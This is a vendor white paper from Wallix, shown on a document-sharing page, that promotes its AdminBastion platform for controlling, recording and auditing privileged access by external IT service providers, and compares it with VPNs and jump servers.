Livre Blanc Gestion des prestataires v6.5 EN
Description
SYVHR7GROEE0)AEEOEORE)UNRFAOSRRMNACDCVROLNVSRYOSROXEEMNSL4+EEENIT PTI TPI T TI P I Contents I. The operational difficulties engendered throughc oruerse to IT service providers .......... .3. ........a) Security risks .................................................................................... 3 b) Problem of compliance with regulatory requiretms e.n...................................... .4. .......c) Implementation and maintenance costs ................................................................................... .5. d) The case of shared accounts .................................................. .............. 5 II. What are the existing solutions? ................................................................. 6 a) Low granularity of user rights...................................................................................................... 6 b) Multiplicity of solutions engendering complex madinistration ........................................... .6. .....c) Reporting unsuited to regulatory requiremen.t.s ............................................ .7. ...d) Disclosure of passwords ....................................................................... 7 e) Insufficient traceability ........................................................ ................. 7 III. Wallix AdminBastion (WAB) – the administratiotfno rmpla for external service providers ....... 7 a) ...
Informations
| Publié par | Rozis |
| Nombre de lectures | 21 |
| Langue | English |
| Poids de l'ouvrage | 11 Mo |
Extrait
Contents I. The operational difficulties engendered through recourse to IT service providers ....................... 3 a) Security risks................................................................................................................................ 3 b) Problem of compliance with regulatory requirements............................................................... 4 c) Implementation and maintenance costs..................................................................................... 5 d) The case of shared accounts ....................................................................................................... 5 II. What are the existing solutions?..................................................................................................... 6 a) Low granularity of user rights...................................................................................................... 6 b) Multiplicity of solutions engendering complex administration .................................................. 6 c) Reporting unsuited to regulatory requirements ......................................................................... 7 d) Disclosure of passwords .............................................................................................................. 7 e) Insufficient traceability................................................................................................................ 7 III. Wallix AdminBastion (WAB) – the administration platform for external service providers....... 7 a) Extremely high access rights granularity ..................................................................................... 8 b) Multiple device compatibility...................................................................................................... 8 c) Integrated reporting tool ............................................................................................................ 9 d) Nondisclosure of target account passwords ............................................................................... 9 e) Total traceability of the operations carried out ........................................................................ 10 f) Integration in the existing identity management system ......................................................... 10 g) Reduced installation and administration costs ......................................................................... 10 h) Generation of alerts .................................................................................................................. 11 IV. The advantages of such a solution ............................................................................................ 11 a) Reduced installation and administration costs ......................................................................... 11 b) Risk mitigation ........................................................................................................................... 11 c) Standards compliance ............................................................................................................... 12 V. Conclusion ..................................................................................................................................... 12
White Paper – IS: Keeping control over your external service providers – v1.0
Page 2
I. The operational difficulties engendered through recourse to IT service providers Companies today have to open up their IT systems to an ever-increasing number of external service providers, firstly in order to reduce the IT budget (which means calling in external service providers in order to leverage competencies that are not part of the core business of the IT department) and then in order to ensure quicker deployment of new solutions and IS maintenance. These different types of service providers may include, for example: · business software vendors needing to work on their applications · facilities managers handling the management of all or some of the infrastructures and/or applications · outsourcers in charge of technical support (e.g., computer services company specialized in Oracle support and tuning) · specialized consultants in a specific application domain (e.g., CRM or ERP expert) Every form of external service providing has two main short-term drawbacks: loss of control, higher the time for execution due to access authorization processes and loss of skill. Over the long term, the difficulty resides in controlling the costs of externalization. When it comes to IT facilities management, there are additional risks in terms of security, regulatory compliance and access management. a) Security risks Service providers are indispensable to the smooth running of the IT system, but they are not company employees and therefore represent a potentially sizable risk (threat) for the company (data leakage, destruction of sensitive data, etc.). Furthermore, without sophisticated audit systems, it is very difficult to track the root causes and responsibilities for any possible malfunctions. Some recent studies have confirmed the risks inherent in the privileges enjoyed by IT administrators - whether these administrators are in-house employees or else external service providers. The following information serves by way of illustration (1) : - 35% of IT administrators admitted they were using their administration rights to snoop around the network to access confidential or sensitive information - 74% of IT administrators admit to being capable of getting around the current mechanisms for protecting confidential or sensitive information - Among the sensitive information to which administrators have access include, in order of importance: o Customer database 1 Source: 2009 Trust, Security & Passwords Survey Research Brief – survey carried out by Cyber-Ark Software on 400 IT professionals White Paper – IS: Keeping control over your external service providers – v1.0 Page 3
o Human resources database o Merger/takeover plan o Marketing information o Redundancy plan In the event of dismissal, IT administrators leaving the company would take with them the following information: Type of information 2009 2008 Customer database 47% 35% Email Server Admin Account 47% 13% M&A Plans 47% 7% Copy of R&D plans 46% 13% CEO's Password 46% 11% Financial Reports 46% 11% Privileged Password List 42% 31%
It should be noted that the current economic situation seriously increases the risk of information leakage. Recourse to external service providers - for administrating all or part of the IS equipment -magnifies these risks on account of: - The very rapid staff turnover among many service providers, which increases the risk of information leakage following the departure of one of their IT administrators - The difficulty for the client to be able to guarantee the probity of the service provider’s personnel, the risk being magnified in the case of a service provider with teams situated in low-wage economies, considering the trade value of the accessible information. Lastly, the company's IT personnel must also be able to log in remotely - whether on-call or simply working at a remote location - with the problems of connection that are identical to those of external service providers. b) Problem of compliance with regulatory requirements Access to sensitive systems and applications is subject to very strict audit rules: accesses must be protected by passwords which in turn are subject to very rigorous rules. Accounts must have been created by authorized personnel and must be deleted as soon as the user has a change of role within the company.
White Paper – IS: Keeping control over your external service providers – v1.0 Page 4
Alongside this, companies must prove that these rules are respected. This work is very costly in terms of process implementation. These processes are associated with the identity of the user and their role in the company. How then do you deal with a user who has no identity within the company and whose role is defined by a facilities management contract and not by a function within the company? External service providers access highly sensitive privileged accounts, but the integration and monitoring of their activity are very complex since they are not employees of the company and therefore require the implementation of specific roles and processes. c) Implementation and maintenance costs The implementation of a facilities management contract is a long process and requires the cooperation of several departments. It is necessary, for example, to provide access to the IT system core, which necessitates the participation of systems managers, network managers, security managers, and so on. Closing this access at the end of the facilities management contract is just as complicated to implement. What is more, this time there is no-one relying on its implementation, which means that there is a heightened risk of accesses remaining open which should have been closed long ago. This is why IT managers must regularly run audits in order to check that accesses have indeed been closed once the external service providers have logged out for the final time. d) The case of shared accounts At the bridge of compliance, security and maintenance costs is the problem of shared accounts. The existence of shared accounts has very often become a necessity for many companies. Creating individualized accounts for carrying out maintenance operations is something of a headache, but the more operators there are using one shared account the more difficult it is to maintain a password policy and the more difficult it is to audit access. Companies wishing to outsource their IT maintenance have to face up to a difficult choice: either, create privileged accounts dedicated to their service providers, or, compromise the security and compliance of their systems.
White Paper – IS: Keeping control over your external service providers – v1.0
Page 5
II. What are the existing solutions? Various solutions already exist with the objective of providing secure access for external service providers, such as: IPSEC or SSL VPN, SSH jump servers, jump servers, leased lines, internal development, etc. These solutions are generally installed in a DMZ and are placed in relay between the external service provider and the target device.
However, these solutions have various disadvantages: a) Low granularity of user rights These solutions generally provide access control at the IP address level, without progressing to the level of the target account. It is therefore not possible, for example, to authorize connection with one or more precise accounts only but simply to authorize access to a device and to all its accounts! b) Multiplicity of solutions engendering complex administration For each type of device there is in general a specific solution. For example, UNIX or Linux servers will be accessible in SSH via a jump server, while Windows servers will for their part be accessible via a Windows TSE server, and on-call operatives will log on via an SSL VPN solution. Each of these solutions is administered in a specific way, with the corollary of high daily administration costs, and therefore a high risk of admitting access rights that are too permissive in order to avoid having to modify them.
White Paper – IS: Keeping control over your external service providers – v1.0 Page 6
c) Reporting unsuited to regulatory requirements These solutions provide access for external service providers to critical systems and must therefore ship reporting features enabling the compliance of these accesses to be checked with respect to the various standards (SOX, Basel 2, etc.). However, the great majority of these solutions do not in general include reporting tools that meet these requirements. d) Disclosure of passwords These solutions require service providers to know the account password used on the target device, which means that for generic system account (e.g., "administrator" account on a Windows server or "root" on a UNIX/Linux server), the password of this account has to be passed on to the service provider. This transmission may constitute a major security risk on account of the fact that passwords for generic system accounts are very rarely modified. e) Insufficient traceability These solutions generally supply a connection-log, but without making precisely know what was done during the connection. It is therefore not possible to know, for example, if an external service provider has tried to jump to another server. III. Wallix AdminBastion (WAB) the administration platform for – external service providers Wallix AdminBastion (WAB) is a solution developed by Wallix specifically for the needs of private companies and public organizations wishing to put in place an administration platform designed to handle external service providers. It is the perfect complement to the SSL or IPSEC VPN solutions already present in companies and can be used to replace solutions such as RDP or SSH jump servers.
White Paper – IS: Keeping control over your external service providers – v1.0
Page 7
WAB offers the following characteristics: a) Extremely high access rights granularity WAB defines access rights not at device level but at target accounts level. Therefore, depending on their profile, an external service provider is able to log in to a given set of target accounts. It also means that, on the same Windows server, service provider X may for example be authorized to use the "administrator" account while another service provider, Y, will only be authorized to use an account with far fewer privileges. User rights management uses the concept of RBAC (Role-Based Access Control). It should be noted, in addition to access rights, that WAB also enables "protocol" rights to be defined in the case of a SSH connection. It is therefore possible, for each service provider, depending on the target account, to authorize or to block: · access to the Shell · execution of remote commands · the uploading or downloading of files via SCP For example, this makes it possible to authorize a service provider in charge of server supervision only to send commands to these servers (e.g., Reboot) without the possibility of connecting to the Shell or transferring files. b) Multiple device compatibility WAB does not require the installation of an agent on the target devices and therefore enables - via native support for RDP, SSH, TELNET, SFTP and RLOGIN protocols – the management and recording of connections with the main types of target device: · Windows servers · UNIX servers (AIX, Solaris, HP-UX, etc.) · Linux servers · network devices, etc. In addition, WAB is able to record connections using other protocols - and in particular business protocols - via the use of an intermediate RDP server (e.g., Windows Terminal Server Edition) serving as a jump server on which the customer software for the applications that need to be registered (e.g., Oracle, SAP, Notes, VMware, etc.) is installed.
White Paper – IS: Keeping control over your external service providers – v1.0
Page 8
c) Integrated reporting tool Via the WAB administration interface it is possible to consult the log of connections per user or per target account, and also to know at any time "who is logged in to what". Furthermore, with WAB is possible at any time to obtain reports of the access authorizations for and of each user, along with the access rights for each target account. WAB, for example, automatically supplies a list of users who are able to use a specific account on a device (e.g., who have access to the generic "root" account of a Linux server). d) Nondisclosure of target account passwords WAB has a centralized authentication module which stores the different passwords for target accounts. This means that it is possible to enable a service provider to log into a privileged account without having to send them the corresponding password. What is more, in the event of a service provider having access to several target accounts, the former will only need to know a single password : their WAB account password, therefore avoiding the risk of password leakage that exists in other solutions. It should be noted that this functionality may, of course, be deactivated on an account by account basis. In this case, the service provider will need to provide authentication firstly on the WAB and then on the target device. In the case of shared accounts , whether for the root account or any other privileged account, WAB takes care of every aspect of security, since these accounts are now accessible by external service providers without them having to know the passwords for these accounts. It is easy to regularly change the password. Each service provider having access is identified by their unique WAB identity, and their session is both logged and recorded. Thanks to WAB, system administrators are able to maintain the flexibility offered to them by shared accounts without compromising the audit or security rules.
White Paper – IS: Keeping control over your external service providers – v1.0 Page 9
e) Total traceability of the operations carried out WAB enables the contents of sessions to be recorded, both in Flash© video file format for RDP/TSE sessions (Windows servers) and in text or video file format for SSH, TELNET and rlogin sessions (Linux & UNIX servers, network devices, etc.). These session recordings can then be viewed in order to know exactly what has been done by a service provider on a target device. In addition, the recordings in the form of text files for SSH sessions make it easy to carry out searches via keyword. Note: session records may be stored in the WAB itself or else exported to an external storage device. f) Integration in the existing identity management system WAB fits seamlessly into the legacy system in terms of user management. Hence, if the service providers feature in an enterprise directory (e.g., LDAP, Active Directory, etc.), they can be authenticated via this directory. Needless to say, WAB also allows them to be authenticated locally (the service provider password is then managed by the WAB). WAB also offers strong authentication thanks to its support of RADIUS as an external authentication protocol, and therefore supports solutions such as RSA SecurID and SafeWord. Last but not least, WAB ships an API that enables an third party app (IAM, helpdesk, etc.) to manage the application. g) Reduced installation and administration costs WAB is marketed mainly in the form of a hardware or virtual appliance, enabling the solution to be rolled out in a very short timeframe. Furthermore, the implementation of the solution does not require the installation of an agent, either on the target devices or on user workstations. The initial configuration of the WAB, along with its daily administration, takes place via a web interface (https) that is easy and intuitive to use and available in English and French. It is also possible to administer the WAB via an "Online Command" interface (CLI). What is more, WAB enables administrators to continue using their usual server administration tools (SSH clients such as Putty or WinSCP, RDP "Remote desktop" client, etc.), so eliminating the need to train service providers on new tools. Note: to logon to target devices via the WAB, service providers may of course use a PC (Windows, Mac, Linux, etc.) but may also use a smartphone (iPhone, Android, BlackBerry, Windows Mobile, etc.).
White Paper – IS: Keeping control over your external service providers – v1.0 Page 10
h) Generation of alerts WAB ships an alerts generation module that allows an alert to be sent in advance to a specific person (e.g., WAB administrator) in the event of a login to a target account judged to be critical. This alert is transmitted by e-mail and is also recorded in the corresponding WAB log file, so making it easy to process using a commercially available supervision tool. Upon receiving this alert, the WAB administrator has the possibility - if the session appears to be illegitimate - to "kill" this session directly via the screen which displays the list of open sessions in real time. IV. The advantages of such a solution The deployment of the Wallix AdminBastion solution for the administration of external IT service providers offers IT managers’ decisive competitive. a) Reduced installation and administration costs Compared to the use of several juxtaposed market solutions, this type of solution offers the advantage of a low TCO (Total Cost of Ownership). In a project of this kind, the elements taken into account when comparing different solutions are as follows: - Duration of the installation project: are we talking of a workload that can be measured in man-days or man-months? - Administration costs: how long will it take to integrate a new service provider along with the corresponding access rights; how long will it take to upgrade the pool of equipment that is to be administered? - User training: how long will it take to train an external service provider in the use of the solution? (An important consideration, particularly when covering holiday periods and organizing the inevitable replacements.) b) Risk mitigation When compared to having no such solution, or to having a solution that offers only partial answers to the problems highlighted, the deployment of Wallix AdminBastion allows IT managers to reduce considerably the risks associated with recourse to external service providers: - Nondisclosure of passwords for target devices - Granularity of access rights - Comprehensive traceability of administration sessions (session recording) - Alerts in the event of access to critical servers White Paper – IS: Keeping control over your external service providers – v1.0 Page 11
© 2010-2024 YouScribe